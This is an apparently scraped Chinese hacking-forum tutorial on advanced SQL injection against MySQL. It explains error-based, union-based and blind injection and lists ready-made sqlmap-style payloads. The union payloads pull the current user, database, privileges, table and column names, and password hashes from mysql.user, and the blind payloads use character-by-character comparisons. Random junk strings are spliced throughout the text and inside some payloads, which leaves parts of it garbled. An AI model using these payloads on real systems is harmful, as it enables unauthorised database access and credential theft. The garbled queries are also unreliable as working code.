放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。 r1 w+ o- r& p# P, f# k
: ^% ?$ D) x7 a: P这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
# j% p; c: h$ ^) D$ R8 V# ?
* c- N) h1 q7 c# {" r$ w: g) v分类标准 分类 备注
3 ?3 n) r% P7 ~! k6 d按字段类型 整型注入,字符型注入
" _# u) H& @0 U S' U j7 G" ~按出现的位置 get注入,post注入,cookie注入,http header注入
! Y. ~; n0 y* A! v9 O C( S然而高级注入是这样的0 B- j! t& l1 s4 d$ p* [+ G, |* S! @
4 C8 F9 V$ j' G9 G4 \0 B( r3 J高级注入分类 条件
7 y3 ~) ?2 h# p- ^# K' verror-based sql 数据库的错误回显可以返回,存在数据库,表结构
6 F* R' _+ Y6 e9 iunion-based sql 能够使用union,存在数据库,表结构* K4 l2 y, `% B5 e C0 m
blind sql 存在注入3 d0 S$ |( j9 F& L9 _7 _& i# _
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
4 [: C5 T$ j! u" E: S
+ [* z3 L4 G$ L: Y [好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火+ S! @7 U- ^9 h7 x
3 ~8 w+ C2 O; ~0 S$ z附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
; R! ^9 u. n% X$ Y( f 3 n7 X( Q$ r9 U& Y7 _0 o. [$ @; t
这里用mysql说明& u9 G5 n6 v* B. z ^9 w
/ Y5 q, A# @9 V' n! he注入坛子里很多了,请看戳我或者再戳我# I' s$ t) s# q# \% L4 _+ A. w* r
. e! D5 ]2 j1 q' ]- R
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的, R/ _) { a* O2 j7 j' Q: J: c% `
. B( x6 C& V- u. d
获取当前数据库用户名
$ [, S5 \2 _' @
1 S6 S* p8 D7 x9 T; J' bUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C$ x& U7 p/ h) v V& P2 Q
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL: d: D$ o3 K( [
L, NULL#( v4 A+ E" N }
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。8 Y4 ^1 |6 x3 W8 M
, I- q2 l \4 C: q; A获取数据库名7 Z9 e) D# C5 i( i" B6 n
2 h9 ~/ e* p1 _: E( R
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#9 v/ I% `# P+ K4 p( N; J8 V
获取所有用户名. Y: q9 j. e0 _+ Z9 [- u
) [2 w9 i2 P# `" E# Y lUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
" u# H! ] w0 E8 ?- V& X- U查看当前用户权限
+ N0 d8 F4 J4 o+ _- ^, }0 n1 x ! F6 m& B( P% T7 A6 Q8 O
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
1 T: l9 C- C0 k! f尝试获取密码,当然需要有能读mysql数据库的权限
; r4 E" j! X( r& v- }# z5 l5 M
+ ^( d) I5 h% {0 K( E, r2 K+ AUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#8 H) \! P$ l# m7 N3 a" a
获取表名,limit什么的自己搞啦* j P# b0 W7 w. H
. ]: J j% S& _4 z s2 o
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
6 B7 Z8 ~; q6 R: m5 j5 `& D获取字段名及其类型
( h) K. n7 }$ H' [UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
: L8 I0 Y% C$ y4 W% D4 p k ( ?0 U9 g8 k1 {- O
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
' @$ y2 P+ i( {, k4 W 0 l- @+ m4 k) _% E) n( G
如:* S1 V7 M' U0 O& M
获取当前用户名
# V. V( a& T4 v' R4 _" y% G$ f3 a4 P
X; u6 Q, Q: z+ m+ \; @2 {% EAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
$ r/ |" n2 b p9 Q4 z; j" v5 j获取当前数据库
. |# Q$ q1 d5 y1 |0 Q - E/ ^. u: t! g9 ^% c3 Q
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
% t! ~0 @0 ^* t" [1 b( |2 w5 S$ h获取表名
( F' a6 p5 g: \& B; r3 Z5 J; ] ( `' e5 a- C, V9 F p& B2 ~) g
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
( G, O; r% K3 W% L- s+ K获取字段名及其类型和爆内容就不说了,改改上面的就可以了。) N' z+ |9 w* l; g
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。( m* B# a! O: a/ p+ ^% x
爆表" M' P( o+ Q, R4 I/ K* @: X
* \9 z* f7 Q( a* k
AND EXISTS(select * from table)
$ D$ L7 G$ y# T" }+ v- c8 |爆字段
% a$ \9 l" n. d1 A " B1 }7 o" i r3 g* S
AND EXISTS(select pwd from table)
+ F k* \3 B4 `" X7 Y3 T7 Q盲注的变化就比较多了,由于篇幅,只是举个例子而已。9 Y s9 \7 F- x6 s% N
7 {; v- W. ?( Z本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。2 }* y7 q) x1 Z" _& D% j: m6 ?
|